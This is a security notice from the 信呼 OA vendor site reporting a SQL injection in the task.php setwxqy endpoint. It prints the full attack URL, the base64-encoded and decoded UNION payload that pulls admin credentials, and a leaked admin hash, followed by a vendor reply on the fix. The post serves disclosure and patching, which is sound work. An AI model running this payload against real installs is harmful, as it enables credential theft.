信呼
为企业构建一个基于互联网的企业管理平台, 对企业中沟通与互动,协作与管理的全方位整合,并且免费开源系统,二次开发更快捷,即时推送审批,掌上APP手机办公。
联系我们
  [提问问题]
有事直接问,不要问在不在
微信联系我们 
[授权]  [演示]  在线客服
当前位置:首页 > 信息内容 > 最新安全漏洞
最新安全漏洞
浏览次数(310+35),最后更新(2026-05-06 16:49:43)

根据系统日志今天发现一个安全漏洞,对方通过:https://xxxx.com/task.php?m=login%7capi&a=setwxqy&callback=cb&num=1&agentid=1&shouji=jybvtklptibtruxfq1qgtlvmtcxovuxmlenptknbvch1c2vyldb4n2m3yyxwyxnzksxovuxmle5vtewstlvmtcwxle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmiezst00gegluahvfywrtaw4gv0hfukugdhlwzt0xiexjtuluidegt0zgu0vuidatlsat&userid=ea==

方式攻击,可以查到管理账号信息。shouji=后面的内容是通过base64加密,解密出来的内容是:' union null,null,concat(user,0x7c7c,pass),null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from xinhu_admin where type=1 limit 1 offset 0-- -ǫ

如果你的管理员或用户表是xinhu_前缀的,数据直接被查询出来。

我进行测试得出的数据是:cb({"msg":"","code":200,"success":true,"data":{"user":"admin||63449778365a59c7f45de1295099397fa"}})

密码是md5加密的,大家都知道md5是可以解密的。

所以大家的表前缀最好是修改成其他字符,管理员admin账号用其他其他代替。或者官方修复这个漏洞。

[img,{fileurl}/img/65379.png,700]

[img,{fileurl}/img/37872.png]

[img,{fileurl}/img/62066.png,700]

原创文章,禁止转载复制,信呼OA官网保留一切知识产权。

  •  1楼 官网(2026-05-06 18:15:45) 
    已修改,升级最新就好了,或者找到文件webmain/task/api/loginAction.php删除setwxqyAction方法
  •  2楼 VIP(2026-05-06 18:21:37) 
    感谢回复,我马上执行。
评论回复(2)
 
关注我们公众号
Copyright ©2016-2026 信呼办公OA系统 版权所有   闽公网安备35052402000488号   闽ICP备18008179号-2   ↑回到顶部